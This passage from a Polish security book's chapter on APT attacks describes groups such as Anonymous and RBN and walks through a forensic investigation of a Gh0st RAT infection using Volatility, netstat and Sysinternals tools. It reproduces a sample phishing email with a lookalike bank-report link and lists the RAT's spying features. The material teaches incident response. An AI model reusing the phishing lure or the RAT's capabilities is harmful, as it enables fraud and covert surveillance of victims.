wykorzystywały uprawnienia przeglądarki do pobierania i instalowania (oraz konfigurowania)

trojana z „furtką” — narzędzia RAT (ang. Remote Administration Tool).

RAT umożliwiał napastnikom dostęp do systemu przez szyfrowane połączenie SSL.

Następnie napastnicy przeprowadzili rekonesans sieci, zdobyli dane uwierzytelniające

z katalogu Active Directory, wykorzystali je do uzyskania dostępu do komputerów

i udziałów sieciowych z własnością intelektualną oraz tajemnicami handlowymi,

a następnie wyprowadzili te dane. Wszystko to trwało kilka miesięcy, przez

które grupa nie została wykryta. Adresy komputerów, które były źródłem ukierunkowanego

phishingu i programów pobierających trojany, wskazywały na Tajwan,

natomiast połączenia typu C&C (ang. Command and Control) do trojana z „furtką”

pochodziły z dwóch chińskich szkół. Każda z tych szkół była pod pewnymi względami

konkurencją dla amerykańskich organizacji, które padły ofiarą ataku (np. dla

firmy Google), jednak nie udało się znaleźć dowodów na to, że akcja była finansowana

lub wspomagana przez chiński rząd albo przemysł.

Inne powszechnie opisywane ataki APT, w tym „Night Dragon” z 2010 roku,

RSA Breach” z 2011 roku i „Shady RAT”, były prowadzone przez kilka lat. Obejmowały

podobne namierzanie celów. Do przeprowadzenia rekonesansu i wyprowadzenia

poufnych danych zastosowano ukierunkowany phishing z użyciem e-maili, wykorzystywanie

luk w aplikacjach, szyfrowane połączenia i narzędzia RAT z „furtkami”.

Wzorzec ten jest charakterystyczny dla ataków APT. Zwykle są one proste (choć

gdy jest to konieczne, stosuje się zaawansowane techniki), a po udanym włamaniu

napastnicy niewykryci działają przez kilka miesięcy lub lat. Często za źródło ataków

uznaje się Chiny, choć raporty chińskiego rządu i chińskiego oddziału organizacji

CERT wskazują na to, że to właśnie chiński przemysł i rząd najczęściej są celem napastników.

Niezależnie od tego, czy ataki są prowadzone z Chin, Indii, Pakistanu, Malezji,

Korei, Zjednoczonych Emiratów Arabskich, Rosji, Stanów Zjednoczonych, Meksyku

czy Brazylii (kraje te podaje się jako źródła połączeń C&C w operacjach APT),

w atakach APT utalentowani hakerzy uzyskują dostęp do systemów, a następnie

namierzają i wyprowadzają poufne informacje wykorzystywane w konkretnym celu.

 

382 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Grupa Anonymous

Popularność 6

Łatwość przeprowadzenia 5

Szkodliwość 7

Ocena zagrożenia 6

Anonymous to powstała w 2011 roku zaawansowana grupa hakerów, która zademonstrowała,

że potrafi się zorganizować w celu namierzenia komputerów rządowych

i korporacyjnych oraz złamania ich zabezpieczeń. Grupa ta z powodzeniem przeprowadziła

ataki przez odmowę usługi na banki, spenetrowała jednostki rządowe (miejskie,

stanowe, krajowe oraz międzynarodowe) i wykradła poufne dane, a także ujawniła

te informacje, co miało bardzo poważne skutki. Przejęte dane dotyczyły m.in.

tożsamości pracowników i menedżerów oraz szczegółów na temat związków między

firmami i agencjami rządowymi.

Anonymous to luźno powiązana grupa (lub zbiór grup) o częściowo pokrywających

się interesach, która potrafi zorganizować się na potrzeby osiągania różnych

celów — od handlowych (ujawnianie kompromitujących szczegółów na temat powiązań

biznesowych) po społeczne (ujawnianie korupcji lub zakłócanie pracy rządu,

a także ułatwianie i koordynowanie komunikacji oraz działań zainteresowanych

obywateli). Grupa stosuje rozmaite techniki hakerskie, m.in. wstrzykiwanie kodu

w SQL-u, skrypty XSS i wykorzystywanie luk w usługach sieciowych, a także metody

inżynierii społecznej, w tym ukierunkowany phishing i podawanie się za pracowników

firmy (np. pracowników pomocy technicznej) w celu uzyskania danych uwierzytelniających.

Członkowie grupy są bardzo pomysłowi i skuteczni. Ich głównym celem jest

ujawnianie informacji, a nie zdobywanie dzięki nim przewagi konkurencyjnej lub

korzyści finansowych. Grupa infiltruje też sieci komputerowe, a nawet instaluje

furtki”, które może w przyszłości wykorzystać.

Ponieważ Anonymous reprezentuje interesy społeczne, celem jej członków jest

pokazanie, że niewielka grupa może mieć duży wpływ przez zakłócanie pracy serwisów

lub ujawnianie poufnych informacji. Sukcesy tej grupy są nagłaśniane, a porażki

są niemożliwe do wykrycia. Wynika to z tego, że jej działania są rozproszone i przypominają

pracę zautomatyzowanych lub ręcznych skanerów oraz próby penetracji,

na które sieci firmowe są nieustannie narażone.

Zdaniem wielu osób grupa Anonymous nie przeprowadza ataków APT, ponieważ

jej akcje często mają na celu uszkodzenie witryny lub zablokowanie dostępu do serwisu.

Jednak działania te nieraz mają odciągać uwagę od innych operacji. Kilka głośnych

akcji grupy Anonymous wobec agencji rządowych i firm z listy Fortune 500 obejmo-

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 383

wało ataki typu DDoS na witryny (rysunek 6.1) i włamania na komputery połączone

z wyprowadzeniem poufnych informacji. Uzyskane dane często są ujawniane na

publicznych forach i udostępniane dziennikarzom w celu wzbudzenia sensacji.

Rysunek 6.1. Grupa Anonymous wykorzystaa narzdzie LOIC (ang. Low Orbit Ion Cannon)

do przeprowadzenia ataków DDoS na przeciwników serwisu WikiLeaks

RBN

Popularność 5

Łatwość przeprowadzenia 5

Szkodliwość 7

Ocena zagrożenia 6

RBN (ang. Russian Business Network) to grupa przestępcza skupiająca firmy i organizacje.

Wcześniej działała w Sankt Petersburgu, a obecnie dzięki partnerom rozprzestrzeniła

się na wiele innych państw i prowadzi działalność na skalę międzynarodową.

Grupa zarządza kilkoma botnetami, które wynajmuje, rozsyła spam, stosuje

phishing, rozpowszechnia szkodliwe oprogramowanie i zajmuje się hostingiem płatnych

witryn pornograficznych (także z pornografią dziecięcą i z fetyszami). Botnety

zarządzane przez grupę RBN lub powiązane z nią działają w uporządkowany sposób.

Służą do kradzieży tożsamości i środków finansowych oraz wykorzystują bardzo

zaawansowane szkodliwe oprogramowanie do utrwalenia swojej obecności na komputerach

ofiar.

 

384 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Szkodliwe oprogramowanie stosowane przez RBN jest zwykle bardziej zaawansowane

niż narzędzia używane w atakach APT. Oprogramowanie to często służy do

bezpośredniego osiągania celów liderów grupy, a ponadto zapewnia abonentom platformę

do prowadzenia innych działań (botnety można wykorzystać np. do przeprowadzenia

ataków DDoS i jako systemy pośredniczące w połączeniach w atakach APT).

RBN jest przykładem zorganizowanej działalności przestępczej, jednak nie jest to

jedyna grupa tego typu. Cyberprzestępcy (zarówno stowarzyszeni z RBN, jak i niezależni)

wykorzystują RBN jako model, a ich sieci przez cały 2011 rok ułatwiały ataki

APT innym grupom. Ułatwianie dostępu do przejętych systemów jest przykładem

działań z obszaru APT.

CZYM ATAKI APT NIE S?

Równie ważne jak zrozumienie, czym są ataki APT, jest ustalenie, czym one nie są.

Opisane wcześniej techniki są stosowane zarówno w atakach APT, jak i przez innych

napastników, którzy są zainteresowani (często z uwagi na dostrzeżoną okazję) zakłóceniem

pracy firmy, sabotażem, a nawet działalnością przestępczą.

APT nie jest ani konkretnym szkodliwym programem, ani zestawem szkodliwego

oprogramowania, ani określoną czynnością. Ataki APT to skoordynowane i szeroko

zakrojone działania, które mają pozwolić osiągnąć konkretny cel (związany z konkurencją,

finansami, reputacją itd.).

PRZYKADOWE POPULARNE NARZDZIA I TECHNIKI

Z OBSZARU APT

Aby opisać ataki APT i sposoby ich wykrywania, w dalszych podpunktach przedstawiamy

przykładowe narzędzia i techniki wykorzystane w kilku tego rodzaju atakach.

Atak za pomoc narzdzia Gh0st

Popularność 9

Łatwość przeprowadzenia 10

Szkodliwość 9

Ocena zagrożenia 9

Narzędzie RAT o nazwie Gh0st, używane w atakach Gh0stnet w latach 2008 –

2010, to znany przykład szkodliwego oprogramowania stosowanego w atakach

APT. 29 marca 2009 roku w serwisie Information Warfare Monitor (IWM;

www.infowar-monitor.net/about/) opublikowano dokument zatytułowany Tracking

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 385

Gh0stNet Investigation of a Cyber Espionage Network (www.infowar-monitor.net/

research/). Dokładnie opisano w nim szczegółowe badania śledcze związane z atakiem

(i włamaniem) na systemy komputerowe Prywatnego Biura Dalajlamy, tybetańskiego

rządu na uchodźstwie i kilku innych tybetańskich organizacji. Po dziesięciu miesiącach

żmudnych badań zespół utalentowanych „cyberdetektywów” stwierdził, że źródłem

ataków były Chiny, a do włamania do systemów ofiar wykorzystano zaawansowane

szkodliwe oprogramowanie — narzędzie RAT o nazwie Gh0st. Na rysunku 6.2 przedstawiono

program do wydawania poleceń z tego narzędzia, a w tabeli 6.1 opisano

możliwości Gh0sta. Pora pokrótce omówić jego najważniejsze funkcje.

Rysunek 6.2. Ekran do wydawania polece i sprawowania kontroli w Gh0cie

W poniedziałkowy poranek w listopadzie Charles otworzył swoją skrzynkę

pocztową. Musiał zapoznać się z długą listą e-maili, skończyć jakąś papierkową robotę

i wziąć udział w dwóch spotkaniach w dziale finansów. W trakcie odpowiadania na

wiadomości Charles zauważył, że jedna z nich była zaadresowana do działu finansów.

Dotyczyła pewnej błędnie przeprowadzonej transakcji finansowej. W wiadomości

znajdował się odnośnik do raportu na temat błędu.

Charles kliknął odnośnik, ale zamiast zobaczyć raport, ujrzał białą stronę z tekstem

Proszę czekać. Ładowanie w toku”. Po zamknięciu przeglądarki Charles ponownie

zajął się pracą i zapomniał o nieudanym transferze pliku. Gdy po spotkaniach wrócił

do biurka, okazało się, że komputer zniknął. Pojawiła się za to notatka od działu bezpieczeństwa.

Wyjaśniono w niej, że maszyna była źródłem podejrzanych danych.

W międzyczasie zatrudniono śledczego do zbadania tej sprawy i pomocy przy niej…

 

386 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Funkcja Opis

Usuwanie istniejących rootkitów Usuwanie z tablicy SSDT (ang. System

Service Descriptor Tables) wszystkich

istniejących „haków”

Menedżer plików Kompletny menedżer plików z hostów

lokalnych i zdalnych

Kontrolowanie ekranu Pełna kontrola nad zdalnym ekranem

Eksplorator procesów Kompletna lista wszystkich aktywnych

procesów i otwartych okien

Rejestrator wciśnięć klawiszy Rejestrowanie wciśnięć klawiszy na zdalnym

komputerze (w czasie rzeczywistym

i w trybie offline)

Zdalny terminal Zdalna powłoka ze wszystkimi funkcjami

Przechwytywanie sygnału z kamery Przekaz na żywo sygnału z kamery

(jeśli jest dostępna)

Śledzenie dźwięku Przekaz na żywo dźwięku z zainstalowanego

mikrofonu (jeśli jest dostępny)

Łamanie kont z dostępem

wdzwanianym

Wyświetlanie kont (wraz z hasłami)

mających dostęp wdzwaniany

Zdalne wygaszanie ekranu Wygaszanie ekranu na przejętym hoście

(komputer staje się bezużyteczny)

Zdalne blokowanie urządzeń

wejścia

Blokowanie myszy i klawiatury

w przejętym hoście

Zarządzanie sesją Zdalne zamykanie i ponowne uruchamianie

hosta

Zdalne pobieranie plików Możliwość pobierania plików binarnych

z internetu na zdalny host

Tworzenie niestandardowego

serwera Gh0st

Konfigurowalne ustawienia serwera

w niestandardowym pliku binarnym

Tabela 6.1. Moliwoci Gh0sta (dziki uprzejmoci Michaela Spohna z Foundstone Professional

Services)

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 387

Szkodliwe e-maile

Po rozmowie z Charlesem i wieloma innymi osobami stało się jasne, że każdy z pracowników

kliknął adres URL z e-maila. Na szczęście była dostępna treść wiadomości.

Od: Jessica Long [mailto:administrateur@hacme.com]

Wysłano: Poniedziałek, 19 grudnia 2011, 09:36

Do: US_ALL_FinDPT

Temat: Nieudana transakcja bankowa

Komunikat został wysłany w związku z płatnością bankową nr 012832113749

wysłaną niedawno z Pana konta.

Obecny status transakcji to: „nieudana z powodu błędu technicznego”. Prosimy

zapoznać się z poniższym raportem w celu uzyskania dodatkowych informacji:

http://finiancialservicesc0mpany.de/index.html

Z poważaniem

Jessica Long

Stowarzyszenie Płatności Elektronicznych — dbamy o bezpieczeństwo Waszych

transakcji

W trakcie analizowania e-maili śledczych zdziwiło, że firma z siedzibą w Stanach

Zjednoczonych używała niemieckiego adresu URL (z przyrostkiem .de) do dostarczania

raportów na temat nieudanych transakcji finansowych. Następny krok polegał

na szukaniu śladów w nagłówkach e-maila.

< US_ALL_FinDPT @commercialcompany.com>; Mon, 19 Dec 2011 09:36:07

Received:EmailServer_commcomp.comt (x.x.x.x.) by

ObiWanbmailplanet.com (10.2.2.1) with Microsoft SMTP Server id

10.1.1.1; Mon, 16 Dec 2011 09:35:21

Received: from unknown (HELO arlch) ([6x.8x.6x.7x]) by

ObiWanmailplanet.com with ESMTP; Mon, 19 Dec 2011 09:34:19

Za pomocą zapytań WHOIS oraz narzędzi Robtex Swiss Army Knife Internet Tool

(www.robtex.com) i PhishTank (www.phishtank.com) śledczy odkrył, że adres IP

pochodził z Niemiec i znajdował się na kilku czarnych listach adresów używanych

do rozsyłania spamu.

Oznaki w amania

Szkodliwe oprogramowanie niezależnie od tego, czy jest używane w atakach APT, czy

w standardowy sposób, powinno przetrwać ponowne uruchomienie systemu. Wykorzystuje

się do tego różne mechanizmy:

 

388 Vademecum hackingu. Skuteczna obrona sieci przed atakami

 rozmaite węzły Run w rejestrze,

 tworzenie usług,

 podłączanie się do istniejących usług,

 wykorzystanie zaplanowanych zadań,

 ukrywanie komunikacji jako normalnego ruchu,

 zastępowanie głównego rekordu rozruchowego,

 zastępowanie BIOS-a systemu.

W trakcie analiz podejrzanego systemu śledczy posługują się technikami badawczymi

i procedurami reagowania na incydenty. Właściwy sposób reagowania na incydenty

jest oparty na stopniu zmienności danych, co opisano w dokumencie RFC 3227

(ietf.org/rfc/rfc3227.txt). Podano w nim kolejność, w której należy zbierać dowody.

Związana jest ona ze zmiennością danych.

 Pamięć.

 Plik stronicowania lub wymiany.

 Informacje o działających procesach.

 Dane dotyczące sieci, np. porty oczekujące na pakiety lub istniejące połączenia

z innymi systemami.

 Rejestr systemu (jeśli istnieje).

 Pliki dzienników systemowych lub aplikacji.

 Obraz dysków utworzony na potrzeby analiz.

 Nośniki ze zarchiwizowanymi danymi.

Aby zbadać maszynę, do której się włamano, przygotuj pakiet różnych narzędzi.

W trakcie analiz ważne jest to, żeby nie zniszczyć dowodów. Narzędzia stosowane

przy reagowaniu na incydenty należy skopiować na płytę CD i zewnętrzne nośniki

pamięci masowej. W omawianej sytuacji analitycy wykorzystali narzędzia z pakietu

Sysinternals i narzędzia do zastosowań śledczych:

 AccessData FTK Imager,

 Sysinternals Autoruns,

 Sysinternals Process Explorer,

 Sysinternals Process Monitor,

 WinMerge,

 Currports,

 Sysinternals Vmmap.

Uwaga Wane jest to, e te narzdzia zapisane na pycie CD potrafi dziaa samodzielnie.

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 389

Rejestrowanie zawartoci pamici

Gdy badania przeprowadza się zgodnie z poziomem zmienności danych, należy zacząć

od wykonania zrzutu pamięci z zaatakowanego komputera i wyeksportować

go do zewnętrznego urządzenia z pamięcią masową. Zrzut może przydać się do analiz

szkodliwego oprogramowania prowadzonych za pomocą narzędzia Volatility Framework

Tool. W programie FTK Imager wybierz opcję File/Capture Memory, czego efekt

pokazano na rysunku 6.3. Wskaż zewnętrzne urządzenie z pamięcią masową jako katalog

wyjściowy, nadaj zrzutowi nazwę podobną do nazwazainfekowanejmaszyny.mem

i kliknij przycisk Capture Memory, żeby wykonać zrzut.

Rysunek 6.3. Tworzenie migawki pamici zainfekowanego systemu

Analizy pamięci mają miejsce po zebraniu wszystkich dowodów. Dostępnych

jest kilka narzędzi do analizowania pamięci — m.in. FDPro i Responder Pro firmy

HBGary, Mandian Memoryze i The Volatility Framework (www.volatilesystems.com/

default/volatility). Każde z nich potrafi wyodrębnić z migawek pamięci związane

z procesami dane, np. wątki, łańcuchy znaków, zależności i połączenia. Wspomniane

narzędzia służą do analizy migawek pamięci, a także powiązanych plików systemu

operacyjnego Windows (Pagefile.sys i Hiberfil.sys). Analizy pamięci są bardzo istotnym

aspektem badań ataków APT, ponieważ wiele narzędzi i metod stosowanych przez

napastników jest opartych na wstrzykiwaniu kodu do procesów i innych technikach

 

390 Vademecum hackingu. Skuteczna obrona sieci przed atakami

zaciemniania. Jednak analiza pamięci pozwala poradzić sobie z tymi sztuczkami,

ponieważ pliki i połączenia muszą zostać odszyfrowane w korzystających z nich procesach

systemu operacyjnego.

Ciekawe jest znakomite omówienie krok po kroku analiz pamici trojana R2D2 (nazywanego te

Bundestrojanem; uyto go w synnym ataku APT omawianym w mediach w Niemczech w 2011 roku).

Znajdziesz je na stronie www.evild3ad.com/1136/volatility-memory-forensics-federal-trojan-aka-r2d2/.

Plik stronicowania (wymiany). Pamięć wirtualna używana przez system operacyjny

Windows jest przechowywana w pliku Pagefile.sys, który znajduje się w głównym

katalogu dysku C:. Gdy pamięć fizyczna zostaje wyczerpana, system w razie potrzeby

wymienia pamięć procesów. Plik stronicowania może zawierać cenne informacje

na temat infekcji szkodliwym oprogramowaniem lub ukierunkowanych ataków.

Także plik Hyberfil.sys obejmuje dane z pamięci, zapisywane po przejściu systemu

w stan hibernacji. Analitycy mogą znaleźć tu dodatkowe dane. Plik ten standardowo

jest ukryty i używany przez system operacyjny.

Za pomocą narzędzia FTK Manager można skopiować wspomniane pliki do urządzenia

z dowodami, co pokazano na rysunkach 6.4 i 6.5. Po kliknięciu pliku stronicowania

prawym przyciskiem myszy można go wyeksportować na takie urządzenie.

Warto pamiętać, że lepiej jest utworzyć obraz dysku zainfekowanego lub podejrzanego

komputera, jednak nie zawsze jest to praktyczne rozwiązanie. Wtedy plan reagowania

na incydenty (taki jak opisany w tym rozdziale) pomaga zebrać ważne dane

i artefakty, przydatne do powstrzymania i pozbycia się napastników oraz zareagowania

na ich działania. Przydatny proces analizowania zapisanych plików z zawartością

pamięci opracowano w ramach projektu The Sandman Project (sandman.msuiche.

net/docs/SandMan_Project.pdf).

Rysunek 6.4. Zapisywanie plików z zawartoci pamici w aktywnym systemie

Uwaga

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 391

Rysunek 6.5. Eksportowanie pliku pagefile.sys

Analizowanie pamici. Do analizowania plików ze zrzutem pamięci można zastosować

wspomniane wcześniej oprogramowanie o otwartym dostępie do kodu źródłowego —

The Volatility Framework Tool. Najpierw należy zidentyfikować obraz:

$ python vol.py -f /home/imegaofmemdump.mem imageinfo

Następnie trzeba pobrać procesy:

$ python vol.py -f /home/imegaofmemdump.mem pslist

Teraz można sprawdzić połączenia sieciowe:

$ python vol.py -f /home/imegaofmemdump.mem connscan

 

392 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Jak widać, aktywne są dwa połączenia. Jedno to 23.66.232.11 w porcie 80. Ma

ono identyfikator PID 1696. Można sprawdzić ten identyfikator w danych na temat

procesów i powiązać go z procesem aktualizującym Javę. Drugie aktywne połączenie

to 192.168.6.128 w porcie 80 i z identyfikatorem PID 1024. Jest to identyfikator

jednego z procesów svchost.exe.

Przyjrzyjmy się dokładniej procesowi o identyfikatorze PID 1024.

$ python vol.py -f /home/imegaofmemdump.mem dlllist –p 1024

Pojawią się dane widoczne na rysunku 6.6.

Teraz wyświetlmy biblioteki DLL z procesu, aby zbadać plik 6to4ex.dll:

$ python vol.py -f /home/imegaofmemdump.mem dlldump –p 1024

dump-dir /Media/Storagedevice

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 393

Rysunek 6.6. Wtyczka dlllist wywietla m.in. bibliotek 6to4ex.dll

Zawartość pliku 6to4ex.dll można w prosty sposób sprawdzić za pomocą polecenia

strings. Należy przyjrzeć się danym zwróconym przez instrukcję dlldump i podać

odpowiednią wyeksportowaną nazwę pliku.

$ strings /MEDIA/Storagedevice/module.1024.2432

Polecenie to zwraca następujące dane:

 

394 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Zwróć uwagę na ścieżkę E:\gh0st\server\sys\i386\RESSDT.pdb i inne dane zwrócone

przez polecenie strings. Informacje te są bardzo przydatne przy dodatkowych

analizach szkodliwego oprogramowania.

Narzędzie Volatility obejmuje doskonałe wtyczki do wyszukiwania śladów szkodliwego

oprogramowania w plikach ze zrzutami pamięci. Pamiętasz wykryte wcześniej

połączenie o identyfikatorze PID 1024 używane przez jeden z procesów svchost.exe?

Można sprawdzić, czy w procesie tym znajdują się „haki”. Do wyszukiwania „haków”

do interfejsu API w trybie użytkownika lub trybie jądra służy wtyczka apihooks.

Zwrócone przez nią dane są następną oznaką tego, że proces svchost.exe o identyfikatorze

PID 1024 jest podejrzany.

$ python vol.py -f /home/imegaofmemdump.mem apihooks –p 1024

Ostatni etap wymaga zastosowania wtyczki malfind. Ma ona wiele funkcji. Można

ją zastosować do wykrywania w pamięci ukrytych lub wstrzykniętych procesów.

$ python vol.py -f /home/imegaofmemdump.mem malfind –p 1024

-dump-dir /media/storagedevice

Dane wyjściowe są zapisywane w plikach na wybranym nośniku. Pliki te można

przesłać do skanera Virustotal (www.virustotal.com) lub do producentów programów

antywirusowych, aby sprawdzić, czy podejrzane pliki są szkodliwe i znane.

Plik MFT (ang. Master File Table). Plik MFT można skopiować i przeanalizować

w podobny sposób jak plik Pagefile.sys. Każdy plik w wolumenie NTFS jest przedstawiony

jako wpis w specjalnym pliku MFT. Jest on bardzo wartościowy w trakcie

analiz. Znajdują się w nim nazwy plików, znaczniki czasu i wiele innych metadanych,

które można pobrać, aby lepiej zrozumieć incydent (na podstawie korelacji czasowych,

nazw plików, ich rozmiarów itd.).

Wróćmy do analiz. Można zbadać pliki stronicowania i MFT, aby odkryć, co się

stało po otwarciu e-maila i kliknięciu adresu URL. Określenie czasu zdarzeń jest niezwykle

istotne we wszystkich śledztwach. Ważne jest, aby przed rozpoczęciem rejestrowania

zmiennych danych odnotować czas rozpoczęcia śledztwa oraz czas pokazywany

przez podejrzaną maszynę. Poniższe dane z pliku MFT wskazują na to, że

program do pobierania trojanów (plik server.exe) został utworzony przez użytkownika

Ch1n00k w katalogu %TEMP% o godzinie 9.43 19 lutego 2011 roku.

Sie, proces i rejestr. Dla napastników w atakach APT ważne jest to, aby uzyskać

połączenie z kilkoma hostami i móc poruszać się po sieci. Dlatego istotne jest ustalenie,

czy maszyna utrzymuje podejrzane połączenia z innymi (nieznanymi) adresami.

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 395

W zainfekowanym komputerze otwórz wiersz poleceń i wpisz następującą

instrukcję:

netstat –ano

Netstat (od ang. network statistics, czyli statystyki sieciowe) to uruchamiane z wiersza

poleceń narzędzie, które wyświetla wejściowe i wyjściowe połączenia sieciowe. Oto

parametry tego polecenia:

 -a. Wyświetla wszystkie aktywne połączenia oraz porty TCP i UDP, w których

komputer oczekuje na pakiety.

 -n. Wyświetla aktywne połączenia TCP. Adresy i numery portów są podane

w formie liczbowej. Narzędzie nie próbuje ustalać nazw za pomocą zapytań DNS.

 -o. Wyświetla aktywne połączenia TCP i podaje identyfikator PID każdego

połączenia.

Identyfikator PID jest przydatny, ponieważ pozwala ustalić, który proces korzysta

z podejrzanego połączenia.

Dane wyjściowe zwrócone przez instrukcję można przesłać na urządzenie z dowodami.

Umożliwia to następujące polecenie:

netstat –ano > [litera napdu z urzdzeniem]:\netstatoutput_[nazwa_komputera].txt

Po uruchomieniu tej instrukcji pojawią się dane wyjściowe pokazane na rysunku 6.7.

Widoczna jest w nich sesja między podejrzanym hostem (192.168.6.132) a maszyną

o adresie IP 192.168.6.128. Połączenie działa w porcie 80 (odbiornik HTTP). Warto

zauważyć, że identyfikator PID sesji to 1040.

Rysunek 6.7. Dane wyjciowe polecenia netstat obejmuj procesy oczekujce na pakiety

i wysyajce dane

 

396 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Plik hosts. Można też szybko sprawdzić, czy nie wprowadzono zmian w pliku hosts

systemu. Pierwotny plik (/Windows/System32/drivers/etc) ma wielkość 734 bajty. Każdy

większy rozmiar to powód do podejrzeń.

Narzdzie CurrPorts. Innym przydatnym narzędziem do badania aktywnych sesji sieciowych

jest CurrPorts. Reprezentuje ono w formie graficznej sesje, co pokazano na

rysunku 6.8 (podejrzane połączenie jest wyróżnione).

Rysunek 6.8. Sesje w programie CurrPorts

Można kliknąć podejrzane połączenie prawym przyciskiem myszy i wybrać opcję

Properties. Pojawią się cenne dane widoczne na rysunku 6.9.

Na podstawie informacji uzyskanych w wierszu poleceń i właściwości podejrzanego

połączenia widocznych w narzędziu CurrPorts otrzymano wartościowe dane na

temat zainstalowanej w systemie „furtki”:

 podejrzane połączenie korzysta z procesu svchost o identyfikatorze PID 1040,

 zdalny port to 80 (odbiornik HTTP),

 używany moduł to 6to4ex.dll.

Przyjrzymy się dokładniej procesowi svchost i dołączonemu do niego plikowi

6to4ex.dll. Posłużą do tego narzędzia Process Monitor, Process Explorer i Vmmap

(wszystkie wchodzą w skład pakietu Sysinternals).

Process Explorer. W narzędziu Process Explorer można sprawdzić proces svchost

o identyfikatorze PID 1040, kliknąć ten proces prawym przyciskiem myszy, a następnie

wybrać opcję Properties. Otwarte okno obejmuje przydatne zakładki. Jedną z nich

jest Strings, która wyświetla szczegółowe informacje na temat związanych z procesem

łańcuchów znaków z obrazu i pamięci (rysunek 6.10).

Analiza danych wyjściowych pozwala lepiej zrozumieć mechanizmy działania

szkodliwego oprogramowania. Po wybraniu zakładki Services ponownie pojawia się

plik 6to4ex.dll (rysunek 6.11).

Oto pewne ciekawe informacje — opis usługi 6to4 to Monitors USB Service Components

(monitoruje składniki usług USB), a wyświetlana nazwa to Microsoft Device

Manager (menedżer urządzeń Microsoftu). Powinno to wzbudzić pewne podejrzenia.

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 397

Rysunek 6.9. Informacje na temat poczenia

Po uruchomieniu narzędzia Process Explorer w podejrzanym hoście okazuje się, że

od czasu do czasu w badanym procesie jest włączany program cmd.exe (rysunek 6.12).

Może to oznaczać, że napastnik jest aktywny lub próbuje uruchamiać instrukcje

w systemie. Uruchomienie narzędzia Process Monitor i wybranie w nim procesu

svchost o identyfikatorze PID 1040 pozwala zobaczyć długą listę wpisów. W trakcie

jej analizowania śledczy odkrywają uruchamianie wiersza poleceń i dane przesyłane

między serwerem C&C a zainfekowanym hostem.

Narzdzie Process Monitor. Process Monitor służy do wyświetlania wszystkich interakcji

z poziomu jądra między procesami a plikami i systemem operacyjnym. Pomaga to

udokumentować i zrozumieć, w jaki sposób szkodliwe oprogramowanie modyfikuje

zainfekowany system. Pozwala to też ustalić oznaki włamania przydatne w pracy nad

skryptami i narzędziami wykrywającymi podobne ataki.

W pokazanych na rysunku 6.13 danych wyjściowych z narzędzia Process Monitor

widać, że proces svchost.exe utworzył wątek, który przesyłał dane. Najpierw wysłano

pakiet TCP, a następnie zainfekowany host odebrał pakiet. Na podstawie tego pakietu

 

398 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Rysunek 6.10. Process Explorer — acuchy znaków powizane z procesem svchost

o identyfikatorze PID 1040

Rysunek 6.11. Podejrzana usuga 6to4

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 399

Rysunek 6.12. W sprawdzanym procesie jest uruchamiany program cmd.exe

Rysunek 6.13. Operacje procesu svchost.exe

przesłano dane na serwer C&C przez połączenie HTTP (port TCP 80). Sześć ostatnich

wpisów oznacza, że przesłano instrukcję (lub instrukcje) za pomocą wiersza poleceń

(cmd.exe). Stacje robocze mają zwykle domyślnie włączoną funkcję Windows Prefetch,

dlatego dla procesu svchost jest dodawany wpis (ponieważ proces używa pliku wykonywalnego).

Katalog Prefetch obejmuje historię ostatnich 128 programów uruchomionych

w systemie (ponowne wykonanie tego samego programu nie jest odnotowywane).

Pobieranie zawartości katalogu Prefetch omawiamy dalej.

VMMap. W maju 2011 roku autorzy pakietu Sysinternals udostępnili nowe narzędzie

VMMap. W witrynie opisano je tak:

VMMap służy do analizy wirtualnej i fizycznej pamięci procesów. Wyświetla

przydzieloną procesowi pamięć wirtualną według jej typów, a także ilość

pamięci fizycznej (roboczej) przypisanej przez system operacyjny dla pamięci

 

400 Vademecum hackingu. Skuteczna obrona sieci przed atakami

wirtualnej poszczególnych rodzajów. Oprócz graficznej reprezentacji wykorzystania

pamięci VMMap wyświetla też podsumowanie i szczegółową mapę

pamięci procesów.

Skoncentrujmy się ponownie na procesie svchost o identyfikatorze PID 1040.

Możliwe jest wyświetlenie powiązanych z nim procesów.

Wróćmy teraz do pliku 6to4ex.dll. VMMap umożliwia wyświetlenie łańcuchów

znaków z tego pliku (rysunek 6.14). Pozwala to uzyskać ciekawe informacje na temat

używanego szkodliwego oprogramowania i jego możliwości. Oto te łańcuchy znaków:

 `%\shell\open\command,

 Gh0st Update,

 E:\gh0st\server\sys\i368\RESSDT.pdb,

 \??\RESSDTDOS,

 ?AVCScreenmanager,

 ?AVCScreenSpy,

 ?AVCKeyboardmanager,

 ?AVCShellmanager,

 ?AVCAudio,

 ?AVCAudiomanager,

 SetWindowsHookExA,

 CVideocap,

 Global\Gh0st %d,

 \cmd.exe.

Po wyszukaniu dalszych informacji na temat pojęć Gh0st i backdoor staje się jasne,

że omawiany plik może być narzędziem RAT, które często stosuje się w atakach APT.

W tabeli 6.1 wyjaśniono, że narzędzie to m.in. przechwytuje dźwięk, obraz i wciśnięcia

klawiszy, udostępnia zdalną powłokę, zdalne polecenia, menedżer plików, podgląd

ekranu oraz ma wiele innych funkcji.

Pami podrczna da DNS. W ustaleniu źródła infekcji przydatny może być zrzut

zapisanych w pamięci podręcznej żądań DNS wysłanych przez podejrzany host. Uruchom

następującą instrukcję:

ipconfig /displaydns > [napd_z_dowodami]\displaydnsoutput.txt

W trakcie analizy danych wyjściowych odkrywamy poniższy wpis:

finiancialservicesc0mpany.de

----------------------------------------

Record Name . . . . . : finiancialservicesc0mpany.de

Record Type . . . . . : 1

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 401

Rysunek 6.14. VMMap wykonuje polecenie strings dotyczce pliku 6to4ex.dll

Time To Live . . . . : 32478

Data Length . . . . . : 4

Section . . . . . . . : Answer

A (Host) Record . . . : 6x.8x.6x.7x

